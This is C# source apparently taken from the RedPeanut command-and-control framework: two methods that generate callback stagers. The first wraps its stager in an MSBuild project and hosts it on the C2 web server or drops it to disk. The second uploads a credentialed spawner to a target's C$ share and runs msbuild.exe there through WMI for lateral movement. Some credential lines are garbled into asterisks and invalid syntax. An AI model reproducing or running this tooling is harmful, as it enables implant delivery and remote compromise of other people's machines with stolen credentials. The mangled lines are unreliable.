private void Run() { List <string> args = new List <string>(); try { if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1) { return; } else { // Parse .cs sorce and repalce variable string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf); string assemblyBase64 = Builder.GenerateDllBase64(source, filename); byte[] assemblybytte = Convert.FromBase64String(assemblyBase64); string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte)); Dictionary <string, string> msbuildargs = new Dictionary <string, string>(); msbuildargs.Add("#{taskname}", taskname); MSBuildGenerator gen = new MSBuildGenerator(agentCompBase64, msbuildargs); if (hosted) { //Add resource to webserver storage C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename)); Console.WriteLine("[*] Resource added to webserver resources"); return; } else { //Write file to tmp env dir File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText()); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename)); } } } } catch (Exception e) { Console.WriteLine("[*] Error running task build {0}", e.Message); return; } }
private void Run() { try { if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(lhost) || (string.IsNullOrEmpty(lpipename) && lport < 1) || profile < 1) { return; } else { // Parse .cs sorce and repalce variable string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { string domainname = "."; if (!string.IsNullOrEmpty(domain)) { domainname = domain; } string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); if (lpipename == null) { //Http no pivot stager ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf); } else { //NamedPipe enable stager ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf); } string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40))); //Create TaskMsg gzip if (agent != null) { source = File.ReadAllText(Path.Combine(folderrpath, SPAWNER_TEMPLATE)) .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" })))) .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn) .Replace("#USERNAME#", username) .Replace("#PASSWORD#", password) .Replace("#DOMAIN#", domain); string spawner = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40))); Dictionary <string, string> msbuildargs = new Dictionary <string, string>(); msbuildargs.Add("#{taskname}", taskname); MSBuildGenerator gen = new MSBuildGenerator(spawner, msbuildargs); string pathdest = string.Format(@"\\{0}\C$\Windows\temp", targethost); string filename = RandomAString(10, new Random()).ToLower() + ".xml"; string filesrc = Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(gen.GetScriptText()))); string destinattionfull = pathdest.TrimEnd('\\') + @"\" + filename; string destinationpath = "."; if (!string.IsNullOrEmpty(pathdest)) { destinationpath = pathdest.Replace("\\", "\\\\"); } string destinationfilename = ""; if (!string.IsNullOrEmpty(filename)) { destinationfilename = filename; } // Parse .cs sorce and repalce variable source = File.ReadAllText(Path.Combine(folderrpath, FILEUPLOAD_TEMPLATE)); source = Replacer.ReplaceFileUpLoad(source, filesrc, destinationpath, destinationfilename, username, password, domainname); string assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, "FileUpLoader.dll", 40))); //Task agent to copy file to target host RunAssemblyBase64(assembly, "FileUpLoader", new string[] { "pippo" }, agent); //Run msbuld via wmi List <string> args = new List <string>(); args.Add("action=create"); args.Add("computername=" + targethost); args.Add("username="******"\\" + username); args.Add("password="******"command=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Windows\\temp\\" + destinationfilename); string s = ""; foreach (string ss in args.ToArray()) { s += ss; } Console.WriteLine("String command: " + s); RunAssembly(PL_MODULE_SHARPWMI, "SharpWMI.Program", args.ToArray(), agent); } } } } catch (Exception e) { Console.WriteLine("[*] Error running task build {0}", e.Message); } }